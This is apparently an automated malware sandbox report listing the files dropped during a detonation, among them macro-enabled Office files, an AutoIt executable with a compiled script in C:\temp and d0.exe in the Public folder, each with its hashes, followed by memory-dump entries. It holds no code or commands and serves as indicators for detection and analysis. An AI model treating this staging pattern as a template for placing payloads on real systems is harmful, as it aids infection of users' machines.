e94d558e64b8b7b9d265974bede59e2c869b315c

SHA256
0be4c202de3c9cf1866c8ecf333965e972e08b53c0cad0cfdb9efcd6bb0e860f

SHA512
a1e59b8374de72afbdca65d5defc1b25cc32edcd70a678b00747357e017c4d8251af3dc63b11f1d43db406f04035ab0efa1f9a667e20876e47cd1bcec28ee7df

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
Filesize
471B

MD5
0786a1d41690c9b4b65efbe4b7ba7317

SHA1
4c81810b6067304651b237757295a875542017d9

SHA256
9de5d5df986a8c9785a7e83e6f119580132479334f2ea49ae8b9ab086d1d1948

SHA512
cc9aa84a133c898c7303cbc2ae425d71d34a56ddf2a4bcccc43e3e60f222e1301d0ab2d2c34e3f5ea05cde42bc6d73011e1954c3b571a351b226ef7d3c6764eb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
Filesize
412B

MD5
f9960ea0bffdb2565e16edf30be2a6e4

SHA1
1b30820eda2b7f819c48ebfe602f7a9370e3a76d

SHA256
7601842e649ff69af5fe6d38a72104a9e91a5792aecfc49c2a8f630b68eaa868

SHA512
91507807a6542b2fe995eab67e2bf2457d55d44dbc0a1771ca2dc93c393e048800e8cc59cfda7f310e54bea6c0ceed6961615a9962cf509eeb3d0876f51d78dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
96B

MD5
d8a865accd5ecd8dee635151f8f2c0f0

SHA1
7fedef30d5867d1086f436f13c7ed15dde268a55

SHA256
e95aceef5a83fc702c5e9ab76185ed88a5986fa99bbaf13b46b0b72408354896

SHA512
b4a8296ccb6512ca5148e88ae80a2191e11d42370db00f225b144b284a40b8d8b8500285844a6989d4fde831c647ce20d4465906d6869dd6cb531c33dcee62bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
b0fc2390eef16f5bc9147a420d9d14e5

SHA1
ac3223c2eb68c677d60d8998059efc0788d1d1bb

SHA256
e22fa3f289a0935b45babe84d330fac046def4c6c10afdb5cf8172251a236ffc

SHA512
3045d315bea1b462c32933565907d1f4bbc29ec2d9f3bb3c884f0e262153a6db206859c5574475b411801b50c7b422722e44788768fef0c002dce4c98769a610

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
874B

MD5
bd19f4ac37c64b28482b98c6cd31b34c

SHA1
014cc9c9e2ba92616dda09a0462b9b225c25f583

SHA256
7e109a82f4e6e514a2fc69294fd5d6b605ab21b36cb8ac4169237550c569c0b1

SHA512
f41951ff1adb26300b3454e17c157ad8da513625294295fcca0759c7f5c734562e060f9c4426782f5a0a33b803cd45f8ab6660f4765c580c822c55e5f1910a57

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
7a503517f5e16197d779b47e480bbbd4

SHA1
8305abd65e4cd0dbf8d3309c282b63fc96372ddb

SHA256
575ce06ee30bb7e7297cdff62a176da7bc20331d7d5afc2a53022276dd9ac61b

SHA512
ddd96d44c86dc2a06001ea669c2c1b470b57aa73a49707f404fa3bffbfd550c76f5a4c1ad7ee531083e88adba01208826bbefa70e039ededd7646dbee66165e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
128KB

MD5
7f8c5314f73d7e36f57ee9c99244c26a

SHA1
7c2da7bf42510e2f7e0911b71aafdfd2b16e0d47

SHA256
7ced5fbb50f9963efaac8b61e81d96a11f2a75043440ba375f0967ee87df69ab

SHA512
0bd5737cd6bf51f246e64c766082a434f9247fc729ab3c38addacad9d2fb6faff8c991b1a5adf0498f56b9f235ac8280f9e0cc62cffe928c7d5062d84c37e382

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9F2C396F-BB9D-4C5E-A7A4-F474A4B0449B
Filesize
160KB

MD5
7c9e3d6b83a589e01473e3bd730b02d5

SHA1
c89b531963bfbf131f1a039d7de0f4db5e02f104

SHA256
73429dc675ec2ccad75a4a3d3a65da404b115ca9b0fc3d9f60e054dcdb88910f

SHA512
b9ddb62c3fa7de0e58c6734e1c3324f719c2f65866dfaaa383bcaf3ec7c9665815240eabd4b03afca6187168a8fde1f138d6f3b822325465b807745fb5a54019

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\TenantInfo.xml
Filesize
76B

MD5
0f8eb2423d2bf6cb5b8bdb44cb170ca3

SHA1
242755226012b4449a49b45491c0b1538ebf6410

SHA256
385347c0cbacdd3c61d2635fbd390e0095a008fd75eeb23af2f14f975c083944

SHA512
a9f23a42340b83a2f59df930d7563e8abd669b9f0955562cd3c2872e2e081f26d6d8b26357972b6d0423af05b2392bddbb46da769788e77fd169b3264ff53886

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
Filesize
2KB

MD5
b02d2b2acf801423ea54f52e4d1635fe

SHA1
9515c9df9cdd1fe4283c6b6ffef51fc14d7d7e10

SHA256
4a0d050b43694cc6903e13c725f424428295a9445e445aa1dc206cb627054756

SHA512
33f732e4e24711b2719150c7cd68d8e5ca8a139ee818889e77885fc7f2a4dbd4d8f34dd4c9a9801de55a7723accb75ddb13bcafa2a07554b42e2863350b04d48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres
Filesize
2KB

MD5
2132d2c425dc14154c87ab4fc059c45e

SHA1
882cbcf5b5a35f09d0be73eeebc715b4c042048e

SHA256
a26727dc788b20949d55f7982fad4d2aa4ca13111c092474d2d6477a126eb1b8

SHA512
8291fd67b598649009773c5bad843ac12f447dcc461a6c3ce28aa3917480bf7ef7797e0ec10eb95d4f4a2c1941013ebad78ed78bcf84a8e28111f7d2bd5ce65a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6E0B9B8C.xlsm
Filesize
16KB

MD5
22327fb2d52afa671fec00bf8741c051

SHA1
97fc1e529ff3615f71da356f1ead4531036cafd9

SHA256
3be9eaaf206fe662f14e37165896ccff629e19c8b49bb7dc3ecf7a26ce920737

SHA512
c4bc94df313d014472703f11d438d5a9211c601e03aa33a6d6a16b9b3a151a1ba85678ae1a18317e5cdd93bcd9b850f350f02eb77ae259c332e116f01705fe64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E40527B3.dotm
Filesize
15KB

MD5
7459d477ff50f28ec453086c1accf11f

SHA1
ae6ff5c5aef60c64234bf1eff36cf662ebb5bad9

SHA256
e69df9398f39865036bb117ef7ae8e50a1c5409a23c4b71b1080c99c35178187

SHA512
dff96c93e6bad579705ee96d3b0a71a553e7c1d77ad0a34e67c889b292bf9c4ee81c195ba92c3f2911812b585fcff993834c09a151b6ec2c1c7af87cf96cbadf

Download Submit
C:\Users\Admin\AppData\Roaming\ABBCcCA
Filesize
32B

MD5
f832206c722e9e414879c654327a9702

SHA1
8b7ea62583d8bdab3ace13ee9760dcad717a4247

SHA256
d176c0906a3bced6e28b8263357de5566ebb013e58afd4e04eac47a712286544

SHA512
539f33cbd7ed2f51692684630af56036c75eaff4577e6639535ecfde414611a824c80d2f92197fda0d20e308b6af72390ed8f03fac9b2d9e5686d97a9f8aa8c0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Filesize
204B

MD5
383c76a6f773fb4f1119f9b8fcf747d5

SHA1
31c4a936ccea0bd264cb3de1406d725622049d8b

SHA256
32fb64b554f906e72fb44e7e5713315576f51fe72bfeeadb265f6c4b55665b52

SHA512
bcec1e460b7c27ff31ed40875e14c6768d988637b3c2f958e25e4775e90b48feb4897c05991742839f97b0d0a36b797e26c19d6c8132a3eb0741466c0c68c5ae

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize
1KB

MD5
38052e51164e3435a33e100cbd9cd0a0

SHA1
a2912572316429e2530e5eaeb26e20481eead0b5

SHA256
8f0a41eb931b3fe45004205b36268862f3d485a86fc1d406cacef0e96010ecf7

SHA512
6ee3bce1393afae7c35162856729f71b932311c776b99dc37ff31cc0b00396ba7b6bd5611845aba9d52f93c039356ef49422f106a19354c671bd248771d28863

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize
24B

MD5
4fcb2a3ee025e4a10d21e1b154873fe2

SHA1
57658e2fa594b7d0b99d02e041d0f3418e58856b

SHA256
90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

SHA512
4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

Download Submit
C:\Users\Public\d0.exe
Filesize
3.5MB

MD5
3f4cb8bd74c039553d7173b5dcfc86c7

SHA1
42ae94a4f07dda071f6f9be024df00432e0d5d91

SHA256
0daa9ee466734ad4e9d55b42d97718711eb6b8858161e72454313a47b21eb7fd

SHA512
f5daffceb74ced4feaa064f251eba2b2d32854694826f64ae12729e6d745d5cd5bb017868d4d7fd8d2aecf14e7d704aeba959e52fa92446103e5c1c7a73e19be

Download Submit
C:\Users\Public\d0.exe
Filesize
4.2MB

MD5
74019cf8562c516c372e09ce02de7355

SHA1
3ce6f711cd1ad954b96cb98055a3a40dae8c9a65

SHA256
8a2edeef9978d454882bfb233d9cd77505618b854f7899b27aeb095ff8ebb3f4

SHA512
7b41d9a1387ebdded1833a655166ffb2cd43b0eb490c5899bf72355a5e2e371b2d0be2231c5252b8fb2a569c92884e8a3391163207fdcb74e66edebcf5cfc771

Download Submit
C:\temp\Autoit3.exe
Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
\??\c:\temp\script.a3x
Filesize
170KB

MD5
ad6840e169e5fa5c51a206f5a851a19c

SHA1
a7b9f5507db10a59919e5ab723f5875a0518b0f6

SHA256
1940b36527e52e1d46b1b0a45ce3e943a123974a6f0dc108929d227f6046f1e0

SHA512
11179e41059523a9feca7091f1478d3a90bb1de67469178e7b70d0f9b531ce0baa2fc6c3f1059db902c7854ccefbdd2f1a185ab7d6e99e14242f438ba7c1343b

Download Submit
\??\c:\temp\script.a3x
Filesize
468KB

MD5
b285a2a2da41e02edd0e090cf3900db0

SHA1
caae12d166fa20fcb5aba44947b379f370d47ec4

SHA256
dbb900ab8d921e3faccd6bb827353683e80be4e4ae530488bc90559251e85c2d

SHA512
1b6624c1af8b0889acbf1eb0abdfb148c04afeb025ac9a21173334f781692dcead0d3fff79e2f156c016b2700aaa4063bb92daec43e1638be9c76f443d37b60c

Download Submit
\??\c:\temp\test.txt
Filesize
76B

MD5
f9c268806eadf724fe06c8485ab592b5

SHA1
b462ca6d6639f0d44cb7fa02a69de2f327f9e1d6

SHA256
4be8f8d0446ecf4d3213ab354e15591428576531acf5af60f6f07e770944bcdd

SHA512
c6bdd408aa3c1a77917dd0f11404cadd8e8f67aea79679ca54817932359e9cf905a5297c9aba945d7de04837fdbe531825d81aab266fd676d6eef2743ac17a33

Download Submit
memory/1920-86-0x0000000002C30000-0x0000000002D8F000-memory.dmp

Filesize
1.4MB

Download
memory/1920-81-0x0000000002C30000-0x0000000002D8F000-memory.dmp

Filesize
1.4MB

Download
memory/2236-243-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-244-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-230-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-232-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-264-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-279-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-233-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-278-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-235-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-240-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-239-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-245-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-237-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-238-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-242-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2236-241-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/2744-107-0x0000000002B10000-0x0000000002C6F000-memory.dmp

Filesize
1.4MB

Download
memory/2744-112-0x0000000002B10000-0x0000000002C6F000-memory.dmp

Filesize
1.4MB

Download
memory/3016-119-0x0000000006050000-0x000000000639F000-memory.dmp

Filesize
3.3MB

Download
memory/3016-117-0x0000000004B60000-0x0000000005B30000-memory.dmp

Filesize
15.8MB

Download
memory/3016-120-0x0000000006050000-0x000000000639F000-memory.dmp

Filesize
3.3MB

Download
memory/4976-133-0x0000000004260000-0x0000000005230000-memory.dmp

Filesize
15.8MB

Download
memory/4976-135-0x0000000005750000-0x0000000005A9F000-memory.dmp

Filesize
3.3MB

Download
memory/5312-92-0x0000000005D60000-0x00000000060AF000-memory.dmp

Filesize
3.3MB

Download
memory/5312-93-0x0000000005D60000-0x00000000060AF000-memory.dmp

Filesize
3.3MB

Download
memory/5312-91-0x0000000004860000-0x0000000005830000-memory.dmp

Filesize
15.8MB

Download
memory/5452-125-0x0000000002A80000-0x0000000002BDF000-memory.dmp

Filesize
1.4MB

Download
memory/5452-129-0x0000000002A80000-0x0000000002BDF000-memory.dmp

Filesize
1.4MB

Download
memory/5520-163-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-213-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-164-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-211-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-210-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-209-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-208-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-207-0x000001B9095E0000-0x000001B909DE0000-memory.dmp

Filesize
8.0MB

Download
memory/5520-206-0x000001B90DC10000-0x000001B90EBE0000-memory.dmp

Filesize
15.8MB

Download
memory/5520-205-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-168-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-167-0x00007FFA4BDE0000-0x00007FFA4BDF0000-memory.dmp

Filesize
64KB

Download
memory/5520-166-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-165-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-215-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-161-0x00007FFA4BDE0000-0x00007FFA4BDF0000-memory.dmp

Filesize
64KB

Download
memory/5520-214-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-162-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-160-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-159-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-157-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-252-0x000001B90DC10000-0x000001B90EBE0000-memory.dmp

Filesize
15.8MB

Download
memory/5520-253-0x000001B9095E0000-0x000001B909DE0000-memory.dmp

Filesize
8.0MB

Download
memory/5520-158-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-152-0x00007FFA4E530000-0x00007FFA4E540000-memory.dmp

Filesize
64KB

Download
memory/5520-156-0x00007FFA4E530000-0x00007FFA4E540000-memory.dmp

Filesize
64KB

Download
memory/5520-153-0x00007FFA4E530000-0x00007FFA4E540000-memory.dmp

Filesize
64KB

Download
memory/5520-155-0x00007FFA4E530000-0x00007FFA4E540000-memory.dmp

Filesize
64KB

Download
memory/5520-154-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/5520-151-0x00007FFA4E530000-0x00007FFA4E540000-memory.dmp

Filesize
64KB

Download
memory/5520-212-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download